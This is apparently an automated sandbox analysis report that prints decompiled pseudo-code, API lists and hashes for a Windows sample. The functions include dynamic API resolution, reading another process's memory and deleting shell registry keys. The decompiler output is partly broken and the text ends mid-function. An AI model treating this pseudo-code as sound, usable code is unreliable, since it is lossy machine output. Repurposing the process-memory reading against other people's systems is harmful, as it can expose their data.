                                                                                                                • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 48%
                                                                                                                			E00409C70(signed int* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                				char* _v16;
                                                                                                                				int _v18;
                                                                                                                				signed int _v20;
                                                                                                                				char _v36;
                                                                                                                				intOrPtr* _t21;
                                                                                                                				struct HINSTANCE__* _t22;
                                                                                                                				signed int _t23;
                                                                                                                				signed int _t24;
                                                                                                                				_Unknown_base(*)()* _t26;
                                                                                                                				char* _t28;
                                                                                                                				int _t31;
                                                                                                                
                                                                                                                				_t21 = _a4;
                                                                                                                				if( *_t21 == 0) {
                                                                                                                					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                					_v8 = _t22;
                                                                                                                					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                                                					 *_a4 = _t23;
                                                                                                                					_t24 = _t23 ^ _v8;
                                                                                                                					if((_t24 & 0xfff00000) != 0) {
                                                                                                                						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                                                						_v20 = _v20 & 0x00000000;
                                                                                                                						_v12 = _t26;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosw");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsw");
                                                                                                                						_t28 =  &_v36;
                                                                                                                						asm("movsb");
                                                                                                                						_v16 = _t28;
                                                                                                                						_v20 = strlen(_t28);
                                                                                                                						_t31 = strlen( &_v36);
                                                                                                                						_v18 = _t31;
                                                                                                                						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                                                					}
                                                                                                                					return _t24;
                                                                                                                				}
                                                                                                                				return _t21;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                • strlen.MSVCRT ref: 00409CE4
                                                                                                                • strlen.MSVCRT ref: 00409CF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcstrlen
                                                                                                                • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 1027343248-2054640941
                                                                                                                • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                                                				long _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				int _v20;
                                                                                                                				int _v24;
                                                                                                                				char _v28;
                                                                                                                				void _v538;
                                                                                                                				char _v540;
                                                                                                                				int _v548;
                                                                                                                				char _v564;
                                                                                                                				char _v22292;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t37;
                                                                                                                				void* _t48;
                                                                                                                				void* _t56;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t67;
                                                                                                                				long _t69;
                                                                                                                				void* _t70;
                                                                                                                				void* _t72;
                                                                                                                				void* _t74;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_t67 = __edx;
                                                                                                                				E0040B550(0x5714, __ecx);
                                                                                                                				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                                                				_t82 = _t37;
                                                                                                                				_a16 = _t37;
                                                                                                                				if(_t37 == 0) {
                                                                                                                					_t69 = GetLastError();
                                                                                                                				} else {
                                                                                                                					_t72 =  &_v22292;
                                                                                                                					E0040171F(_t72, _t82);
                                                                                                                					_v8 = 0;
                                                                                                                					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
                                                                                                                						_t69 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_t48 = E00405642( &_v564);
                                                                                                                						_t74 = _v548;
                                                                                                                						_t70 = _t48;
                                                                                                                						_a12 = _t74;
                                                                                                                						_v540 = 0;
                                                                                                                						memset( &_v538, 0, 0x1fe);
                                                                                                                						asm("cdq");
                                                                                                                						_push(_t67);
                                                                                                                						_push(_t74);
                                                                                                                						_push(_t70);
                                                                                                                						_push(L"%d  %I64x");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v540);
                                                                                                                						L0040B1EC();
                                                                                                                						_v548 = 0;
                                                                                                                						E004055D1( &_v540,  &_v564);
                                                                                                                						_t16 = _t70 + 0xa; // 0xa
                                                                                                                						_t68 = _t16;
                                                                                                                						_v24 = 0;
                                                                                                                						_v12 = 0;
                                                                                                                						_v20 = 0;
                                                                                                                						_v16 = 0x100;
                                                                                                                						_v28 = 0;
                                                                                                                						E0040559A( &_v28, _t16);
                                                                                                                						_t76 = _v12;
                                                                                                                						_t56 = 0x40c4e8;
                                                                                                                						if(_t76 != 0) {
                                                                                                                							_t56 = _t76;
                                                                                                                						}
                                                                                                                						_t26 = _t70 + 2; // 0x2
                                                                                                                						_t66 = _t70 + _t26;
                                                                                                                						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
                                                                                                                						_t85 = _t76;
                                                                                                                						if(_t76 == 0) {
                                                                                                                							_t76 = 0x40c4e8;
                                                                                                                						}
                                                                                                                						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                                                						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
                                                                                                                						E004055D1(_t61,  &_v28);
                                                                                                                					}
                                                                                                                					E004055D1(CloseHandle(_a16),  &_v564);
                                                                                                                				}
                                                                                                                				return _t69;
                                                                                                                			}



























                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                • memset.MSVCRT ref: 00401B4A
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                • String ID: %d %I64x
                                                                                                                • API String ID: 2567117392-2565891505
                                                                                                                • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                                				void* _v8;
                                                                                                                				void _v2054;
                                                                                                                				short _v2056;
                                                                                                                				void _v4102;
                                                                                                                				short _v4104;
                                                                                                                				signed int _t28;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				E0040B550(0x1004, __ecx);
                                                                                                                				_t36 = 0;
                                                                                                                				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                                                					_v2056 = 0;
                                                                                                                					memset( &_v2054, 0, 0x7fe);
                                                                                                                					_v4104 = 0;
                                                                                                                					memset( &_v4102, 0, 0x7fe);
                                                                                                                					_t34 = __ebx + 0x20a;
                                                                                                                					_push(_t34);
                                                                                                                					_push(__ebx);
                                                                                                                					_push(L"%s\\shell\\%s\\command");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v2056);
                                                                                                                					L0040B1EC();
                                                                                                                					_push(_t34);
                                                                                                                					_push(__ebx);
                                                                                                                					_push(L"%s\\shell\\%s");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v4104);
                                                                                                                					L0040B1EC();
                                                                                                                					RegDeleteKeyW(_v8,  &_v2056);
                                                                                                                					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t36 =  ~_t28 + 1;
                                                                                                                					RegCloseKey(_v8);
                                                                                                                				}
                                                                                                                				return _t36;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Delete_snwprintfmemset$Close
                                                                                                                • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                • API String ID: 1018939227-3575174989
                                                                                                                • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040313D(void* __ecx) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				struct HWND__* _t6;
                                                                                                                				_Unknown_base(*)()* _t11;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				void* _t20;
                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                
                                                                                                                				_v12 = 8;
                                                                                                                				_v8 = 0xff;
                                                                                                                				_t15 = 0;
                                                                                                                				_t20 = 0;
                                                                                                                				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                                				if(_t23 == 0) {
                                                                                                                					L5:
                                                                                                                					__imp__#17();
                                                                                                                					_t6 = 1;
                                                                                                                					L6:
                                                                                                                					if(_t6 != 0) {
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                                				if(_t11 != 0) {
                                                                                                                					_t20 = 1;
                                                                                                                					_t15 =  *_t11( &_v12);
                                                                                                                				}
                                                                                                                				FreeLibrary(_t23);
                                                                                                                				if(_t20 == 0) {
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					_t6 = _t15;
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                                				struct HWND__* _v8;
                                                                                                                				struct HWND__* _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				struct tagRECT _v44;
                                                                                                                				int _t50;
                                                                                                                				long _t61;
                                                                                                                				struct HDC__* _t63;
                                                                                                                				intOrPtr _t65;
                                                                                                                				intOrPtr _t68;
                                                                                                                				struct HWND__* _t71;
                                                                                                                				intOrPtr _t72;
                                                                                                                				void* _t73;
                                                                                                                				int _t74;
                                                                                                                				int _t80;
                                                                                                                				int _t83;
                                                                                                                
                                                                                                                				_t73 = __edx;
                                                                                                                				_v8 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_t74 = GetSystemMetrics(0x11);
                                                                                                                				_t80 = GetSystemMetrics(0x10);
                                                                                                                				if(_t74 == 0 || _t80 == 0) {
                                                                                                                					_t63 = GetDC(0);
                                                                                                                					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                                					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                                					ReleaseDC(0, _t63);
                                                                                                                				}
                                                                                                                				GetWindowRect(_a4,  &_v44);
                                                                                                                				if((_a8 & 0x00000004) != 0) {
                                                                                                                					_t71 = GetParent(_a4);
                                                                                                                					if(_t71 != 0) {
                                                                                                                						_v28.left = _v28.left & 0x00000000;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						GetWindowRect(_t71,  &_v28);
                                                                                                                						_t61 = _v28.left;
                                                                                                                						_t72 = _v28.top;
                                                                                                                						_t80 = _v28.right - _t61 + 1;
                                                                                                                						_t74 = _v28.bottom - _t72 + 1;
                                                                                                                						_v8 = _t61;
                                                                                                                						_v12 = _t72;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t65 = _v44.right;
                                                                                                                				if((_a8 & 0x00000001) == 0) {
                                                                                                                					asm("cdq");
                                                                                                                					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                                				} else {
                                                                                                                					_t83 = 0;
                                                                                                                				}
                                                                                                                				_t68 = _v44.bottom;
                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                					L11:
                                                                                                                					_t50 = 0;
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					asm("cdq");
                                                                                                                					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                                					if(_t50 >= 0) {
                                                                                                                						L12:
                                                                                                                						if(_t83 < 0) {
                                                                                                                							_t83 = 0;
                                                                                                                						}
                                                                                                                						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                                					}
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                • GetWindowRect.USER32 ref: 00404E07
                                                                                                                • GetParent.USER32(?), ref: 00404E12
                                                                                                                • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
                                                                                                                • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                                                				void* __esi;
                                                                                                                				void* _t3;
                                                                                                                				int _t6;
                                                                                                                
                                                                                                                				_t3 = E00404AAA(_a4);
                                                                                                                				if(_t3 != 0) {
                                                                                                                					wcscpy(0x40fb90, _a4);
                                                                                                                					wcscpy(0x40fda0, L"general");
                                                                                                                					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                                                					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                                                					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                                                					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                                                				}
                                                                                                                				return _t3;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                • wcscpy.MSVCRT ref: 004063B2
                                                                                                                • wcscpy.MSVCRT ref: 004063C2
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                  • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 16%
                                                                                                                			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                                                				void* _t2;
                                                                                                                				signed short* _t3;
                                                                                                                				void* _t7;
                                                                                                                				void* _t8;
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t3 = __eax;
                                                                                                                				_t8 = __ecx;
                                                                                                                				_t7 = 8;
                                                                                                                				while(1) {
                                                                                                                					_t2 =  *_t3 & 0x0000ffff;
                                                                                                                					if(_t2 != 0x3c) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					_push(_t7);
                                                                                                                					_push(L"&lt;");
                                                                                                                					L14:
                                                                                                                					_t2 = memcpy(_t8, ??, ??);
                                                                                                                					_t10 = _t10 + 0xc;
                                                                                                                					_t8 = _t8 + _t7;
                                                                                                                					L16:
                                                                                                                					if( *_t3 != 0) {
                                                                                                                						_t3 =  &(_t3[1]);
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					return _t2;
                                                                                                                					L3:
                                                                                                                					if(_t2 != 0x3e) {
                                                                                                                						if(_t2 != 0x22) {
                                                                                                                							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                                								if(_t2 != 0x26) {
                                                                                                                									if(_t2 != 0xa) {
                                                                                                                										 *_t8 = _t2;
                                                                                                                										_t8 = _t8 + 2;
                                                                                                                									} else {
                                                                                                                										_push(_t7);
                                                                                                                										_push(L"<br>");
                                                                                                                										goto L14;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									_push(0xa);
                                                                                                                									_push(L"&amp;");
                                                                                                                									goto L11;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_push(0xa);
                                                                                                                								_push(L"&deg;");
                                                                                                                								L11:
                                                                                                                								_t2 = memcpy(_t8, ??, ??);
                                                                                                                								_t10 = _t10 + 0xc;
                                                                                                                								_t8 = _t8 + 0xa;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                                							_t10 = _t10 + 0xc;
                                                                                                                							_t8 = _t8 + 0xc;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_push(_t7);
                                                                                                                						_push(L"&gt;");
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                				struct HDWP__* _v8;
                                                                                                                				intOrPtr* _v12;
                                                                                                                				void _v534;
                                                                                                                				short _v536;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t42;
                                                                                                                				intOrPtr* _t95;
                                                                                                                				RECT* _t96;
                                                                                                                
                                                                                                                				_t95 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_a4 == 0x233) {
                                                                                                                					_v536 = 0;
                                                                                                                					memset( &_v534, 0, 0x208);
                                                                                                                					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                                                					DragFinish(_a8);
                                                                                                                					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                                                					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                                                					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                                                					_t95 = _v12;
                                                                                                                				}
                                                                                                                				if(_a4 != 5) {
                                                                                                                					if(_a4 != 0xf) {
                                                                                                                						if(_a4 == 0x24) {
                                                                                                                							_t42 = _a12;
                                                                                                                							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                                                							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						E00402EC8(_t95 + 0x40);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v8 = BeginDeferWindowPos(0xd);
                                                                                                                					_t96 = _t95 + 0x40;
                                                                                                                					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
